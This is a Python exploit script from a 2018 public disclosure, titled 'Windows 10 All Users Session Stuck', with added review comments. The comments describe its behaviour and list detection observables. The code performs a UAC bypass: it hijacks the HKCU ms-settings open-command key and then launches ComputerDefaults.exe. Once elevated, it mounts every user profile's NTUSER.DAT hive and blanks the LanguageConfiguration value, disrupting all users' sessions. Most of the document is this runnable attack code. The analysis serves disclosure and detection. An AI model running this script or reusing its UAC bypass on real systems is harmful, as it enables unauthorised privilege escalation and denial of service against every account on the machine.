#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis
# Twitter: st0rnpentest
#
# After microsoft's refusal to consider the issue as a security problem, I disclose the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#
# Review notes (defender's reading of the script; Python 2 code, see `_winreg`
# and the `"\NTUSER.DAT"` literal, which is a SyntaxError on Python 3):
#   * Elevated path: for each directory under c:\users\ not listed in
#     `exclude`, the profile hive NTUSER.DAT is mounted as HKU\w00t with
#     `reg.exe LOAD`, the default value of
#     `Control Panel\Desktop\LanguageConfiguration` is set to an empty REG_SZ,
#     and the hive is unmounted with `reg.exe UNLOAD`. The current user's HKCU
#     copy of the same key is modified afterwards.
#   * Non-elevated path: bypass_uac() writes the default value of
#     HKCU\Software\Classes\ms-settings\shell\open\command (plus an empty
#     `DelegateExecute` value) to a cmd.exe line that re-runs this file, then
#     starts C:\windows\system32\ComputerDefaults.exe. The function name says
#     the intent is to relaunch the script elevated; how ComputerDefaults.exe
#     consumes that key is not visible in this file.
#   * Observables for detection: creation of the HKCU ms-settings command key,
#     which is never removed (no DeleteKey/DeleteValue call anywhere);
#     reg.exe LOAD/UNLOAD of HKU\w00t once per profile directory; and
#     ComputerDefaults.exe started from a script interpreter. The per-profile
#     hive writes are gated on IsUserAnAdmin(), i.e. they need an elevated
#     token.
#

from os import listdir, system, path
from ctypes import *
import _winreg

def create_reg_key(key, value):
    # Create (if absent) and open HKCU\Software\Classes\ms-settings\shell\open\command
    # for writing, then store `value` as REG_SZ under `key`. key=None writes the
    # key's default value, which is how exec_bypass_uac() passes the command line.
    # The backslash sequences in the key path are not valid Python escapes, so
    # the string is taken literally (newer Pythons warn about this).
    # The except clause only re-raises, so WindowsError propagates unchanged;
    # there is no finally, so a failing SetValueEx skips CloseKey.
    try:
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def exec_bypass_uac(cmd):
    # Populate the ms-settings command key: an empty `DelegateExecute` value and
    # `cmd` as the key's default value. Both writes go through create_reg_key();
    # WindowsError is re-raised unchanged.
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def bypass_uac():
    # Register a cmd.exe line that re-runs this file with c:\python27\python as
    # the ms-settings handler, then launch ComputerDefaults.exe. Returns 1 on the
    # happy path; the caller in __main__ ignores the return value.
    try:
        # `__file__` is appended as given to its own real directory, so this
        # presumably assumes the script was started by bare file name — TODO confirm.
        current=path.dirname(path.realpath(__file__)) + '\\' + __file__
        # Python interpreter path is hard-coded; `\w`, `\S`, `\c`, `\p` are not
        # escapes, so the string is literal.
        cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current
        exec_bypass_uac(cmd)
        system(r'C:\windows\system32\ComputerDefaults.exe')
        return 1
    except WindowsError:
        # NOTE(review): `sys` is never imported in this file, so reaching this
        # line raises NameError rather than exiting with status 1.
        sys.exit(1)

def modify_reg_key(key, value):
    # Set `value` (REG_SZ) under `key` in the current user's
    # HKCU\Control Panel\Desktop\LanguageConfiguration. OpenKey (not CreateKey)
    # is used, so the key must already exist or WindowsError is raised and
    # re-raised as-is.
    try:
        registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def modify_reg_key_Others(key, value):
    # Same write as modify_reg_key(), but against HKU\w00t, i.e. the foreign
    # profile hive that __main__ mounts with `reg.exe LOAD` just before calling
    # this. Only meaningful between the LOAD and UNLOAD calls; if the hive was
    # not mounted, OpenKey raises WindowsError, which is re-raised unchanged.
    try:
        registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise

if __name__ == '__main__':
    try:
        sys32="c:\\windows\\system32\\"  # assigned but never used
        users="c:\\users\\"  # profile root; drive letter is hard-coded
        # Directory names skipped; the membership test is case-sensitive.
        exclude=["Public", "desktop.ini", "All Users"]
        # Modify all users
        # `windll` comes from `from ctypes import *`; the elevated branch
        # rewrites every other profile's hive, the non-elevated branch only
        # stages the relaunch via bypass_uac().
        if windll.Shell32.IsUserAnAdmin():
            for i in listdir(users):
                if i not in exclude:
                    # system()'s return code is not checked, so a failed LOAD
                    # (presumably a hive already in use) is only noticed when
                    # modify_reg_key_Others() fails to open HKU\w00t. There is
                    # no finally, so on that failure the UNLOAD below is skipped
                    # and any mounted hive stays attached under HKU\w00t.
                    system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")
                    modify_reg_key_Others('', '')
                    system("reg.exe UNLOAD HKU\w00t")
            # Modify current user
            modify_reg_key('', '')
        else:
            bypass_uac()
    except WindowsError:
        # Re-raised unchanged; the handler has no effect beyond the traceback.
        raise